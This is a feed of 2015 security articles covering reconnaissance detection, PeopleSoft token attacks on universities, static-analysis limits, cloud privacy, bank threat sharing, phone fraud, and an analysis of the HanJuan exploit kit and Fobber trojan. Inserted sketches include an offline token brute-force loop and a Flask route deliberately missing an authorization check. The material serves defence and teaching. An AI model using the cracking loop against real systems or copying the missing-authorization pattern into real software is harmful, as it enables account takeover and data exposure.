Infosec Island Latest Articles
https://www.infosecisland.com
Adrift in Threats? Come Ashore!

How to Tell a Landscaper From a Thief
https://www.infosecisland.com/blogview/24626-How-to-Tell-a-Landscaper-From-a-Thief.html
Mon, 20 Jul 2015 21:11:00 -0500

If I can see a person standing in front of a neighboring house inspecting the windows and doors, should I call the police?

Maybe it is an air-conditioning technician looking for the best place to install a new unit, or maybe it is a robber doing reconnaissance and checking for the easiest way to get into the house. It is hard to tell!

Now what if I can see a user sending requests to non-existent pages in my application?

Maybe these are broken links that the user followed by mistake, or maybe they are attack reconnaissance: pre-attack activity by a malicious user. It is also hard to tell!

A key objective for any security team is to make sure that organizational assets -- whether servers, applications or data -- are protected. As a result, preliminary attack reconnaissance that targets non-existent assets may be casually dismissed for lack of interest, human resources or even proper security controls. Moreover, attack reconnaissance can look like legitimate user traffic when inspected in the wrong context.

From a threat intelligence point of view, this casually dismissed attack reconnaissance should be considered valuable information and treated as such. In many cases, reconnaissance activity is the first, or even the only, opportunity to detect malicious activity before it slips under the detection radar.

This article presents an example of how threat intelligence analysis, utilizing a cloud network and inspecting requests for non-existent Web application pages, can help predict upcoming brute force attacks. In other words, how to catch a robber just before he tampers with the door lock.

The Good, The Bad and The Ugly

Brute force Web attackers attempt to gain privileged access to a Web application by sending a very large number of login attempts. In many cases, a brute force attack will start with a preliminary reconnaissance process of finding the login pages of the targeted Web application.

While trying to find those login pages, attackers will use a dictionary of possible login page names. Not all of these pages exist on the targeted Web application; therefore, accessing the non-existent ones will result in a Web application failure.

There are three scenarios for such failures: the Good, the Bad and the Ugly.

The Good

Q: What if we detect someone trying to access a non-existent page, “login.aspx”, on the Web application?

A: If it happened just once, this kind of activity should be ignored. It may simply be a mistake by a legitimate user trying to access the wrong page. There is not enough information to determine that this is a malicious attempt.

The Bad

Q: What if we detect many attempts to access different files on the same Web application (“login.aspx”, “log-in.asp”…), all resulting in failures?

A: It seems this attacker is looking for the login page of the Web application and is just one step from launching a brute force attack. The attacker may use a “slow & low” technique in order to evade detection by security controls.

The Ugly 

Q: What if we detect the same “bad” activity of many attempts to access different files, but this time across many different Web applications?

A: It seems the attacker is planning to launch a distributed attack against many targets, executing reconnaissance on several Web applications at the same time in order to scale up and increase the attack surface.

Learning from the cross-targeted nature of this activity leads us to one unavoidable conclusion: it is going to be Ugly!
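
To make the three buckets concrete, here is a minimal sketch (ours, not from the article) of how a log-analysis job might classify failed requests; the log record format and the five-failure threshold are assumptions for illustration:

    from collections import defaultdict

    # Each record: (source_ip, target_app, requested_path, http_status)
    def classify_recon(records, threshold=5):
        failures = defaultdict(set)  # source_ip -> set of (app, path) that failed
        for src, app, path, status in records:
            if status == 404:
                failures[src].add((app, path))

        verdicts = {}
        for src, misses in failures.items():
            apps = {app for app, _ in misses}
            if len(misses) == 1:
                verdicts[src] = "good"   # a single broken link: ignore
            elif len(apps) == 1 and len(misses) >= threshold:
                verdicts[src] = "bad"    # dictionary scan against one application
            elif len(apps) > 1 and len(misses) >= threshold:
                verdicts[src] = "ugly"   # cross-application reconnaissance
            else:
                verdicts[src] = "watch"  # not enough evidence yet
        return verdicts

Note that the “ugly” verdict is only reachable when failures from many applications are pooled, which is exactly the article’s point about the value of a cloud-wide vantage point.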

Summary

If the attacker already knows the location of the login page, looking for failures in the reconnaissance activity won’t work; but everybody makes mistakes, even (especially) attackers. It is up to security teams to be patient and attentive in detecting such failures and mistakes, which can lead to the detection of a variety of Web attacks.

The accuracy of combining those reconnaissance activities into reliable insights relies on the diversity of the analyzed data. In the example presented above, reconnaissance across many different Web applications was the differentiator in the threat intelligence analysis. Therefore, it is only natural that cloud networks should turn the rich, diverse and continuous data streaming through their infrastructure into threat intelligence.

And when a suspicious person is wandering through your neighborhood inspecting house doors and windows, it is time to call the police!

About the Author: Or Katz is a security researcher at Akamai Technologies.

Universities at risk of Data Breaches: Is it Possible to Protect Them?
https://www.infosecisland.com/blogview/24625-Universities-at-risk-of-Data-Breaches-Is-it-Possible-to-Protect-Them.html
Fri, 17 Jul 2015 09:49:55 -0500

Harvard University recently announced that on June 19 an intrusion into the Faculty of Arts and Sciences and Central Administration information technology networks was discovered. According to the announcement on the Harvard website, the breach affected eight different schools and is thought to have exposed students’ log-in credentials. University IT staff denied that any personal data or information from the internal email system had been exposed.

An advisory on the website urges people affiliated with the affected institutions to change their passwords. Another password change may be required soon as part of the security measures to protect Harvard’s systems.

It is not the first time Harvard has been hacked. Earlier this year the AnonGhost group hacked the website of the Institute of Politics at Harvard, and in 2012 Harvard was attacked by the GhostShell team, which also took responsibility for hacking the servers of 100 major universities, such as Stanford, the University of Pennsylvania and the University of Michigan.

Higher education is certainly one of the industries most commonly targeted by cyber-attacks. The increased attention to the security of educational institutions derives from the fact that universities are less secure than enterprises, while college ERP systems contain data that is no less valuable, and the amount of important information may be even bigger, which means a larger number of potential victims of an attack. The detailed reasons why both cybercriminals and security specialists focus on this area are described below.

Why are university systems a perfect target for cyber-attacks?

The first and main reason lies in the environment of campus systems. University networks have a large number of users: thousands of freshmen enter university every year, and it is hard to imagine any business hiring so many new employees on a regular basis. College systems store the personal information, payment information and medical records of current and former students and employees, and a great amount of sensitive information always attracts attempts to steal it. Moreover, the exposure of this information may have long-term consequences, as some students of the top universities are likely to hold key positions in the near future.

University systems supported a BYOD (bring your own device) policy before the term appeared in the business sphere. Students are active users of the latest technologies, and file sharing, social media and adult content are sources of malware and viruses. If a student’s device synced with the college network is compromised, it is not only the student who is affected, but the university as well. You can find more information on mobile application security and mobile device management security in our article.

Universities have to provide easy access to their systems for all of these students and personnel. This makes incident investigation more difficult than it is in business structures.

Finally, such systems can store not only educational and personal information but also governmental and even military research materials. University systems are therefore an attractive target for state-sponsored hackers, as this data can be used for industrial or state espionage.

What happened? Was Harvard breached via a vulnerability in PeopleSoft?

Harvard has not disclosed any technical details about the breach; thus, it is fertile ground for speculation and baseless conclusions. The only things we can say for sure are that PeopleSoft applications are installed in multiple Harvard colleges (as is known from public sources) and that real examples of universities hacked via PeopleSoft vulnerabilities have taken place in the last few years.

Several cases of data breaches related to vulnerabilities in Oracle PeopleSoft applications have been published in the media since 2007, when two students faced 20 years in prison after they hacked a California state university’s PeopleSoft system. In August 2007, three students installed keylogging software on computers at Florida A&M University and used the passwords they gleaned to gain access to the school’s PeopleSoft system to modify grades. A student at the University of Nebraska in 2012 was able to break into a database associated with the university’s PeopleSoft system, exposing Social Security numbers and other sensitive information on about 654,000 students, alumni and employees. In March 2013, Salem State University in Massachusetts alerted 25,000 students and staff that their Social Security numbers may have been compromised in a database breach. And this is not the full list of attacks on universities, and it covers only those against PeopleSoft systems.

PeopleSoft systems are widely used in higher education; they are implemented in more than 2,000 universities and colleges around the world. ERPScan’s research revealed that 236 servers related to universities are accessible on the internet (including a Harvard server). This means that at least 13% of universities with PeopleSoft systems are accessible from the Internet, while enterprises are at about 3-7% depending on the industry. 78 of these universities are vulnerable to the TokenChpoken attack presented at the Hack In Paris conference by Alexey Tyurin, and 7 of them are among America’s top 50 colleges according to Forbes, so they look like a real treasure to cybercriminals.

The TokenChpoken attack allows an attacker to find the correct key for a token, log in under any account and gain full access to the system. In most cases it takes no more than a day to crack a token using a special brute-forcing program on the latest GPU, which costs about $500. It is almost impossible to identify that this attack has taken place, as the attacker uses common, legitimate system functionality: he brute-forces the token password offline after downloading a token from a web page, and then all he needs to do is log in to the system.
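
The article gives no implementation details, so purely as an illustration of why offline cracking is invisible to the victim, a brute-force loop over a captured token digest might look like the sketch below. The token scheme here (SHA-1 over user fields plus a node password) is a simplified stand-in, not the real PS_TOKEN layout:

    import hashlib

    def crack_token(captured_digest, user_fields, wordlist):
        """Offline guessing: no requests reach the server, so nothing is logged."""
        for candidate in wordlist:
            # Hypothetical scheme: digest = SHA-1(user fields + node password)
            guess = hashlib.sha1(user_fields + candidate.encode()).digest()
            if guess == captured_digest:
                return candidate  # password recovered; tokens can now be forged
        return None

On a GPU the same loop runs orders of magnitude faster than on a CPU, which is why a short or default password can fall within a day.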

Other universities (besides the 78 mentioned above) are also potentially vulnerable, but only students with access to the internal university PeopleSoft system can exploit the vulnerability and gain administrative rights.

Moreover, 12 universities still use the default password for their token, so even an unskilled attacker can successfully perform the attack.

What should we learn from the hacks?

First, we should admit that higher education institutions face risks that can actually result in espionage, blackmail, and fraud.

PeopleSoft is clearly the leader in higher education, though there are other university ERP vendors such as Three Rivers Systems, Ellucian, Jenzabar, Redox and others.

As all university networks are complex and consist of numerous modules, and there are numerous vulnerabilities in them, protecting them can seem a nightmare for any IT team. Cybersecurity is not a set of separate steps taken from time to time, but an ongoing process. Of course, no one can prevent all threats and attacks, so safety lies in the continuous monitoring and mitigation of risks.

Awareness of Oracle PeopleSoft security is even worse than awareness of SAP security, which is also lacking but improving. As for PeopleSoft, there are real examples of vulnerabilities and breaches, but hardly anybody pays attention to them.

Related Reading: Many Organizations Using Oracle PeopleSoft Vulnerable to Attacks

Understanding the Strengths and Limitations of Static Analysis Security Testing (SAST)
https://www.infosecisland.com/blogview/24620-Understanding-the-Strengths-and-Limitations-of-Static-Analysis-Security-Testing-SAST.html
Fri, 17 Jul 2015 09:44:21 -0500

Many organizations invest in Static Analysis Security Testing (SAST) solutions like HP Fortify, IBM AppScan Source, Checkmarx or Coverity to improve application security. Properly used, SAST solutions can be extremely powerful: they can detect vulnerabilities in source code during the development process rather than after it, thereby greatly reducing the cost of fixing security issues compared with dynamic analysis/run-time testing. They can also discover kinds of vulnerabilities that dynamic analysis tools are simply incapable of finding. Because they are automated, SAST tools can scale across hundreds or thousands of applications in a way that is simply impossible with manual analysis alone.

After investing in SAST, some organizations refrain from making further investments in application security. Stakeholders in these organizations are often under the belief that static analysis covers the vast majority of software security weaknesses, or that it covers the most important high-risk items like the OWASP Top 10 and is therefore “good enough”. Instead of building security into software from the start, these organizations are content with getting a “clean report” from their scanning tools before deploying an application to production. This mindset is highly risky because it ignores the fundamental limitations of SAST technologies.

The book “Secure Programming with Static Analysis” describes the fundamentals of static analysis in detail. The book’s authors, Brian Chess and Jacob West, were two of the key technologists behind Fortify Software, which was later acquired by HP. In the book, the authors state that “half [of security mistakes] are built into the design” of the software, rather than the code. They go on to list classes of software security issues, including context-specific defects that are visible in code, among others, and they note that “no one claims that source code review is capable of identifying all problems”.

Static analysis tools are complex. To function properly they need a semantic understanding of the code, its dependencies, configuration files and many other moving pieces that may not even be written in the same programming language. They must do this while juggling speed against accuracy and keeping the number of false positives low enough to be usable. Their effectiveness is greatly challenged by dynamically-typed languages like JavaScript and Python, where simply inspecting an object at compile time may not reveal its class/type. This means that finding many software security weaknesses is either impractical or impossible.

The NIST SAMATE project sought to measure the effectiveness of static analysis tools to help organizations improve their use of the technology. The project performed both static analysis and manual source code review on open source software packages and compared the results. The analysis showed that between one-eighth and one-third of all discovered weaknesses were “simple”. It further found that the tools only discovered “simple” implementation bugs and did not find any vulnerability requiring a deep understanding of code or design. When run on the popular open source tool Tomcat, the tools produced warnings for 4 out of the 26 (15.4%) Common Vulnerabilities and Exposures (CVE) entries. These statistics mirror the findings of the Gartner paper “Application Security: Think Big, Start with What Matters”, in which the authors suggest that “anecdotally it is believed that SAST only covers up to 10% to 20% of the codebase, DAST another 10% to 20%”. To put this in perspective, if an organization had built a tool like Tomcat itself and run it through static analysis as its primary approach to application security, it would be deploying an application with 22 out of 26 vulnerabilities left intact and undetected.

Dr. Gary McGraw classifies many of the kinds of security issues that static analysis cannot find as flaws rather than bugs. While the nature of flaws varies by application, the kinds of issues that static analysis is not reliably capable of finding include the following (a short illustration appears after the list):

  • Storage and transmission of confidential data, particularly when that data is not programmatically discernible from non-confidential data
  • Issues related to authentication, such as susceptibility to brute force attacks, effectiveness of password reset, etc.
  • Issues related to entropy for randomization of non-standard data
  • Issues related to privilege escalation and insufficient authorization
  • Issues related to data privacy, such as data retention and other compliance (e.g. ensuring credit card numbers are masked when displayed)
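
To illustrate the point (this example is ours, not the authors’): the following route is syntactically clean, uses a safe lookup, and contains nothing for a taint-style analyzer to flag, yet any authenticated user can read any other user’s invoice, because the authorization check was never designed in.

    from flask import Flask, jsonify

    app = Flask(__name__)
    INVOICES = {1: {"owner": "alice", "amount": 42}}  # toy data store

    @app.route("/invoices/<int:invoice_id>")
    def get_invoice(invoice_id):
        # Clean lookup: no injection, nothing matches a SAST rule...
        invoice = INVOICES.get(invoice_id, {})
        # ...but nothing verifies that the caller owns this invoice.
        # The missing authorization step is a design flaw, not a code bug.
        return jsonify(invoice)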

Contrary to popular belief, many of the coverage gaps of static analysis tools carry significant organizational risk. This risk is compounded by the fact that organizations may not always have access to source code, that the SAST tool may be incapable of understanding a particular language or framework, and by the challenge of simply deploying the technology at scale and dealing with false positives.

While static analysis is a very valuable technology for secure development, it is clearly no substitute for building applications with security in mind from the start. Organizations that embed security into the requirements and design and then validate with a combination of techniques including static analysis are best positioned to build robust secure software.  

Cross-posted from the SC Labs blog.  

Cloud Security: It’s in the Cloud - But Where? (Part III)
https://www.infosecisland.com/blogview/24622-Cloud-Security-Its-in-the-Cloud-But-Where-Part-III.html
Mon, 06 Jul 2015 09:59:00 -0500

In Part II, I discussed how organizations can enable cloud resilience and why it’s necessary to secure the cloud provider.

Today, let’s look at the need to institute a cloud assessment process and the four actions that organizations of all sizes can take to better prepare themselves as they place their sensitive data in the cloud.

While the cost and efficiency benefits of cloud computing services are clear, organizations cannot afford to delay getting to grips with their information security implications. In moving their sensitive data to the cloud, all organizations must know whether the information they are holding about an individual is Personally Identifiable Information (PII), and must therefore ensure it has adequate protection.

There are many types of cloud-based services and options available to an organization. Each combination of cloud type and service offers a different range of benefits and risks. Privacy obligations do not change when using cloud services, and therefore the choice of cloud type and cloud service requires detailed consideration before either is used for PII.

Unfortunately, there is often a lack of awareness of information risk when moving PII to cloud-based systems. In particular, business users purchasing a cloud-based system often have little or no idea of the risks they are exposing the organization to and the potential impact of a privacy breach. In some cases, organizations are unaware that information has been moved to the cloud. Other times, the risks are simply being ignored. This is at a time when regulators, media and customers are paying more attention to the security of PII.

Here are four key issues:

  • Business users often have little or no knowledge of privacy regulation requirements because privacy regulation is a complex topic which is further complicated by the use of the cloud
  • Business users don’t necessarily question the PII the application will collect and use
  • Business users rarely consider cloud-based systems to be different from internal systems from a security perspective, and thus expect them to have the same level of protection built in
  • Application architects and developers often collect more PII than the applications need.

These issues often expose the organization to risks that could be completely avoided or significantly reduced.

The Cloud Assessment Process

Not to sound like a broken record, but putting private information into the cloud will certainly create some risk, and that risk must be understood and managed properly. Organizations may have little or no visibility over the movement of their information, as cloud services can be provided by multiple suppliers moving information between data centers scattered around the world. If the data being moved is subject to privacy regulations, and the data centers are in different jurisdictions, this can trigger additional regulations or result in a potential compliance breach.

The decision to use cloud systems should be accompanied by an information risk assessment conducted specifically to deal with the complexities of both cloud systems and privacy regulations; it should also be supported by a procurement process that helps compel the necessary safeguards. Otherwise, the relentless pressure to adopt cloud services will increase the risk that an organization will fail to comply with privacy legislation.

The objective of the ISF cloud assessment process is to determine whether a proposed cloud solution is suitable for business-critical information. When assessing risk, here are a few questions that you should ask of your business:

1. Is the information business critical?
2. Where is it?
3. What is the potential impact?
4. How will it be used?
5. How does it need to be protected?
6. What sort of cloud will be used?
7. How will the cloud provider look after it?
8. How will regulatory requirements be satisfied?

Managing information risk is critical for all organizations to deliver their strategies, initiatives and goals. Consequently, information risk management is relevant only if it enables the organization to achieve these objectives, ensuring it is well positioned to succeed and is resilient to unexpected events. As a result, an organization’s risk management activities – whether coordinated as an enterprise-wide program or at functional levels – must include assessment of risks to information that could compromise success.

Better Preparation

Demand for cloud services continues to increase as the benefits of cloud services change the way organizations manage their data and use IT. Here are four actions that organizations of all sizes can take to better prepare:

  • Engage in cross-business, multi-stakeholder discussions to identify cloud arrangements
  • Understand clearly which legal jurisdictions govern your organization’s information
  • Adapt existing policies and procedures to engage with the business
  • Align the security function with the organization’s approach to risk management for cloud services

With increased legislation around data privacy, the rising threat of cyber theft and the simple requirement to be able to access your data when you need it, organizations need to know precisely to what extent they rely on cloud storage and computing.

But remember: privacy obligations don’t change when information moves into the cloud. This means that most organizations’ efforts to manage privacy and information risk can be applied to cloud-based systems with only minor modifications, once the cloud complexity is understood. This can provide a low-cost starting point to manage cloud and privacy risk.

Challenges and Solutions of Threat and Vulnerability Sharing in 2015
https://www.infosecisland.com/blogview/24621-Challenges-and-Solutions-of-Threat-and-Vulnerability-Sharing-in-2015.html
Mon, 29 Jun 2015 11:40:00 -0500

The Evolution of Information Sharing for Banks

Overcoming the challenges that information sharing presents will require greater collaboration across the financial industry and a focus on combined efforts rather than individual protection.

The concept of threat and vulnerability sharing is not new; the practice has been around for decades, taking on various forms. But the cyber-attacks on JPMorgan Chase and several other financial institutions this past year have caused a major push for improved bank security in 2015.

Information sharing programs should reach across sectors to increase accessibility and enhance the conversation between different companies about emerging cybersecurity threats and security enhancements. When an embarrassing breach occurs, the last thing a bank wants to do is share the details and seem vulnerable to its competitors, but doing so will in the end help prevent further attacks across the entire financial sector.

Although more banks are starting to share cybersecurity threats with peer institutions, several challenges still stand as roadblocks to adopting the practice as a best practice. Institutions need to take the initiative and get involved with information sharing programs such as Soltra Edge and FS-ISAC, a financial services information sharing organization sponsored by the federal government. Banks should continue to contribute to and involve themselves in these types of initiatives in order to be proactive about their data safety in the future.

Data collaboration has evolved over time from loose relationships to more formal methods of communication between humans and machine-assisted system updates. New efforts are changing operations, especially in automation and reporting, which are becoming more machine-centric. Much as the IPS movement a decade ago took alerts from IDS systems and acted on them, this will allow large organizations to recognize threats rapidly. These tools lend themselves to quicker detection, allowing banks to combine efforts and identify single actors that are affecting several different financial institutions. By shifting their security vision to incorporate the entire ecosystem, banks will see their competitors as peers and work collaboratively to eliminate cyber attacks as a whole. As offensive tools are used, this type of coordination can help shrink their useful life span from hours and days to seconds.
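
As a toy illustration of that machine-centric correlation (our sketch; it is not how Soltra Edge or FS-ISAC actually work internally), pooling indicator reports from several member banks makes a single actor hitting multiple institutions stand out immediately:

    from collections import defaultdict

    # Each shared report: (institution, indicator), e.g. an attacking IP or file hash
    reports = [
        ("bank_a", "198.51.100.7"),
        ("bank_b", "198.51.100.7"),
        ("bank_c", "198.51.100.7"),
        ("bank_a", "203.0.113.9"),
    ]

    seen_by = defaultdict(set)
    for institution, indicator in reports:
        seen_by[indicator].add(institution)

    # Any indicator reported by more than one member is a cross-institution actor.
    for indicator, members in sorted(seen_by.items()):
        if len(members) > 1:
            print(f"{indicator} seen at {len(members)} institutions: {sorted(members)}")

No single bank’s logs would justify acting on 198.51.100.7; the pooled view does.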

Many people have raised questions about government regulation and whether officials are doing enough to protect banks in the coming year. Although Congress has made failed attempts at passing legislation that would encourage information sharing among banks in the past, financial institutions need to be less reliant on the Fed and more reliant on themselves for security. When government regulates or legislates technical solutions, it can dampen innovation in establishing new ways to handle problems directly and even create unintended consequences. At the same time, too many companies are keeping details of breaches to themselves, making these attacks effective for a longer span of time. Fortunately, more and more banks are seeing the value of information and offering up threat and vulnerability experiences more willingly. Industry and government can foster this by supporting information release and helping set up trusted forums.

In 2015, we should see a surge in new cooperative efforts among concerned companies and government organizations to share details and act to put an end to some of the more persistent problems in cybersecurity today. In many cases, the same malware is being used to attack different institutions across all sectors, and sharing this information could help protect an extremely wide range of companies. The vision for cybersecurity in the financial sector in 2015 should be collaborative and proactive. The financial industry should embrace and adopt information sharing practices and take control back from threat actors. This will lead to less devastating breaches and cyber attacks. With continued support, similar collaborative efforts will utilize information sharing and help level the cyber playing field.

About the Author: Shawn Masters is Senior Technical Director, Novetta Solutions

Enterprises See 30 Percent Rise in Phone Fraud: Report
https://www.infosecisland.com/blogview/24619-Enterprises-See-30-Percent-Rise-in-Phone-Fraud-Report.html
Thu, 25 Jun 2015 12:57:17 -0500

Based on data from its “telephony honeypot,” anti-fraud company Pindrop Security has determined that the number of scam calls aimed at enterprises has increased by 30 percent since 2013.

According to the State of Phone Fraud 2014-2015 report published by Pindrop on Wednesday, financial institutions are the most attractive target for fraudsters.

The company says card issuers are the most affected, with a fraud call rate of 1 in every 900 calls. Banks report a fraud call rate of 1 in every 2,650 calls, and brokerages 1 in every 3,000 calls.

“The higher rate of phone fraud for card issuers can be attributed to the fact that credit cards are one of the most common ways for the public to complete transactions, and thus card numbers are at greater risk for theft,” Pindrop noted in its report. “Compared to credit card numbers, banking or brokerage account numbers are less widely distributed. The less an account number is distributed across channels, the less likely it is to be at risk for fraud.”

Financial institutions risk exposing an average of $7-15 million to phone fraud every year, the report shows.

Retailers, including online retailers, are also targeted by scammers. The average fraud call rate in the case of retailers is 1 in 1,000 calls, but the rate increases for products that are easy to resell, Pindrop Security noted.

Consumers are an attractive target for phone scammers. In the United States, consumers receive 86.2 million scam calls every month, with 2.5 percent getting at least one robocall each week. Pindrop says 36 million of the scam calls made to US consumers can be traced to one of the 25 most common schemes, such as technical support and IRS scams.

Read the rest of this article on SecurityWeek.com.

Elusive HanJuan EK Drops New Tinba Version (updated)
https://www.infosecisland.com/blogview/24618-Elusive-HanJuan-EK-Drops-New-Tinba-Version-updated.html
Thu, 25 Jun 2015 11:24:00 -0500

Update: Dutch security firm Fox-IT has identified the payload as a new version of Tinba, a well-known piece of banking malware.

In this post, we describe a malvertising attack spread via a URL shortener leading to HanJuan EK, a rather elusive exploit kit which in the past was used to deliver a Flash Player zero-day.

Oftentimes cyber-criminals will use URL shorteners to disguise malicious links. In this particular case, however, it is an advertisement embedded within the URL shortener service that leads to the malicious site.

It all begins with Adf.ly which uses interstitial advertising, a technique where adverts are displayed on the page for a few seconds before the user is taken to the actual content.

[Figure: overview of the malvertising redirection flow]

Following a complex malvertising redirection chain, the HanJuan EK is loaded and fires Flash Player and Internet Explorer exploits before dropping a payload onto disk.

The payload we collected uses several layers of encryption, both within the binary itself and in its communications with its Command and Control server.

The purpose of this Trojan is information stealing, performed by hooking the browser to act as a man-in-the-middle and grabbing passwords and other sensitive data.

Technical details

Malvertising chain

[Screenshot: Fiddler capture of the malvertising redirection chain]

The first four sessions load the interstitial ad via an encoded JavaScript blurb:

[Screenshot: the encoded JavaScript]

Google Chrome’s JavaScript console can help us quickly identify the redirection call without going through a painful decoding process:

[Screenshot: the redirection call revealed in Chrome’s JavaScript console]

Subsequent redirections:

[Screenshots: subsequent redirection sessions]

The next three sessions were somewhat different from the rest and an actual connection between them could not be established right away. A deeper look revealed that the intended URL was loaded via Cross Origin Resource Sharing (CORS).

“Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts, JavaScript, etc.) on a web page to be requested from another domain outside the domain from which the resource originated.” (Wikipedia)

[Screenshot: the CORS request]

Content is retrieved from the adk2.com ad network via a cross-origin request, permitted by the Access-Control-Allow-Origin response header.

This takes us to the actual malvertising brought by youradexchange.com:

[Screenshot: the malvertising call from youradexchange.com]

The inserted URL may look benign, and it is indeed a genuine Joomla website, but there is one caveat: it has been compromised and is used as the gate to the exploit kit.

[Screenshot: the compromised Joomla site acting as the gate]

Exploit kit

The exploit kit pushed here looked different from what we are used to seeing (Angler EK, Fiesta EK, Magnitude EK, etc.). After some analysis and comparisons, we believe it is the HanJuan EK.

We have talked about HanJuan EK only a very few times before because little is known about it. What we once described as the Unknown exploit kit was in fact HanJuan, and it has been extremely stealthy and evasive ever since.

And yet, here we found HanJuan EK hosted on a compromised website and with an easy way to trigger it on demand.

[Figure: HanJuan EK infection diagram]

The landing page is divided into two main parts:

  • Code to launch a Flash exploit
  • Code to launch an Internet Explorer exploit

The filename for the Flash exploit is randomly generated each time, using patterns close to those of the original HanJuan we have observed before.

However, a new GET request containing the Flash version in use is inserted right after the exploit is delivered.

Finally, the payload is delivered via another randomly generated URL and filename with a .dat extension. Contrary to previous versions of HanJuan where the payload was fileless, this one drops an actual binary to disk.

Fiddler traffic:

[Screenshot: Fiddler capture of the exploit kit traffic]

Landing page (raw):

[Screenshot: raw landing page]

Flash exploit: (up to 17.0.0.134 -> CVE-2015-0359)

[Screenshot: the Flash (SWF) exploit]

The exploit performs a memory stack pivoting attack using the VirtualAllocEx API.

Internet Explorer exploit (CVE-2014-1776):

[Screenshot: the Internet Explorer exploit]

In this case we also have a memory stack pivoting exploit, but one that uses the undocumented NtProtectVirtualMemory API.

Malwarebytes Anti-Exploit users were already protected against both these exploits:

[Screenshot: Malwarebytes Anti-Exploit blocking the exploits]

Malware payload

The malware payload delivered has been identified by our research team as Trojan.Agent.Fobber. This name was derived from a folder called “Fobber” that’s used to store the malware along with its associated files.

[Screenshot: the “Fobber” directory]

Unlike a normal Windows program, Fobber makes a habit of “hopping” between different programs. The flow of execution for Fobber looks something like what is seen below:

[Figure: Fobber execution flow]

From what we have observed in our research, the purpose of the Fobber malware appears to be stealing user credentials for various accounts. While we have not confirmed any ties between Fobber and other known malware as of yet, we suspect it may be related to other information-stealing Trojans, like Carberp or Tinba.

Fobber.exe

This is the original file dropped by the exploit kit in the user’s temporary directory. The file itself has a random name, but will be referred to as fobber.exe in this article.

Fobber.exe is a mildly obfuscated program. The samples we have observed always attempt to open random registry keys, and then the malware performs a long sequence of jumps in an effort to create something like a “rabbit hole” for analysts to follow, slowing down analysis.

[Screenshot: random registry key accesses]

At the end of the jumps, the program decodes additional shellcode and creates a suspended instance of verclsid.exe. Verclsid.exe is a legitimate Microsoft program, part of Windows, used to verify a Class ID. The shellcode is then injected into verclsid.exe, and fobber.exe resumes execution of verclsid.exe. Below is an API trace of this behavior.

[Screenshot: API trace of the verclsid.exe creation and injection]

At this point fobber.exe terminates and the malware execution continues in verclsid.exe.
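
As a hedged detection idea based on this behavior (ours, not from the original post): verclsid.exe is normally launched by the shell, so an instance with an unexpected parent process is worth a second look. A minimal sweep using the psutil library, with the expected-parent list being an assumption to tune per environment:

    import psutil

    EXPECTED_PARENTS = {"explorer.exe", "svchost.exe"}  # assumption, adjust as needed

    for proc in psutil.process_iter(["name", "ppid"]):
        try:
            if (proc.info["name"] or "").lower() == "verclsid.exe":
                parent = psutil.Process(proc.info["ppid"])
                if parent.name().lower() not in EXPECTED_PARENTS:
                    print(f"suspicious: verclsid.exe (pid {proc.pid}) "
                          f"spawned by {parent.name()} (pid {parent.pid})")
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue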

Verclsid.exe (Fobber shellcode)

The main purpose of the Fobber shellcode inside of this process is to retrieve the process ID (PID) of Windows Explorer (explorer.exe) and inject a thread into the process. Injecting code into Windows Explorer is a very common stealth technique that’s been used in malware for many years.

It is also worth noting that, starting with the Fobber shellcode inside the verclsid process, the malware begins using an interesting unpacking technique, designed to slow analysis, that is exhibited throughout the remainder of the Fobber malware’s operation.

Before a function can be executed, its code is first decrypted, as seen in the image below (notice the junk instructions following “decode_more”).

[Screenshot: encrypted function body before the decoding call]

And then after the call, the instructions become clear.

[Screenshot: the same instructions after decoding]

Eventually, when the function wants to return, it calls a special procedure that uses a ROP gadget.

[Screenshot: the special return procedure using a ROP gadget]

Inside the call seen above (“return_caller”), the return pointer is overwritten to point to the return pointer of the parent function (in this case, sub_41B21A). In addition, all the bytes of the function that was just executed have been re-encrypted, as seen below.

[Screenshot: the function body re-encrypted after return]

Such techniques can make the Fobber malware more difficult to analyze than traditional malware that unpacks the entire binary image. Similar functionality is also seen in many commercial protectors, like Themida.
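
To make the scheme easier to picture, here is a small conceptual model in Python (ours; Fobber does this with x86 code regions and a ROP gadget, not Python objects). Each function body sits encrypted at rest, is decrypted just in time, and is re-encrypted on return, so a memory dump taken at any instant exposes at most one decrypted function:

    KEY = 0x5A  # toy single-byte XOR key

    def xor(blob: bytes) -> bytes:
        return bytes(b ^ KEY for b in blob)

    # Function bodies stored encrypted, like Fobber's code at rest.
    encrypted_funcs = {"get_c2": xor(b"return 'c2.example.com'")}

    def call_encrypted(name):
        body = xor(encrypted_funcs[name])   # decrypt just-in-time
        result = body                       # stand-in for executing the bytes
        encrypted_funcs[name] = xor(body)   # re-encrypt before returning
        return result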

In order to locate the PID of Explorer, the malware searches for a known window name of “Shell_TrayWnd” that’s used by the Explorer process.

[Screenshot: locating the “Shell_TrayWnd” window]

The shellcode uses the undocumented function RtlAdjustPrivilege to grant verclsid.exe the SE_DEBUG_PRIVILEGE. This allows verclsid.exe to inject code into Windows Explorer without any issues. Following this function, more shellcode is decrypted in memory and a remote thread is created inside Explorer.

[Screenshot: remote thread creation inside Explorer]

Following successful injection, verclsid.exe terminates and the malware continues inside of Windows Explorer.

Explorer.exe (Fobber shellcode)

At this point the Fobber malware begins its main operations, including establishing persistence on the victim computer, contacting the C&C server, and many more actions.

Persistence
Fobber keeps a foothold on the victim computer by copying itself (fobber.exe) into an AppData folder called “Fobber” using the name nemre.exe. On a typical computer, this path might look like:

C:\Users\<username>\AppData\Roaming\nemre.exe

The binary is launched when a user logs in using a traditional “Run” key method in the registry.
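
This persistence mechanism is straightforward to audit. A hedged sketch (ours) that lists HKCU Run entries and flags anything launching out of AppData\Roaming, where Fobber’s nemre.exe lives:

    import winreg

    RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:      # no more values under the key
                break
            flag = "  <-- review" if "appdata\\roaming" in str(value).lower() else ""
            print(f"{name}: {value}{flag}")
            index += 1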

VERT Vuln School: Return-Oriented Programming (ROP) 101
https://www.infosecisland.com/blogview/24617-VERT-Vuln-School-Return-Oriented-Programming-ROP-101.html
Thu, 25 Jun 2015 11:21:07 -0500

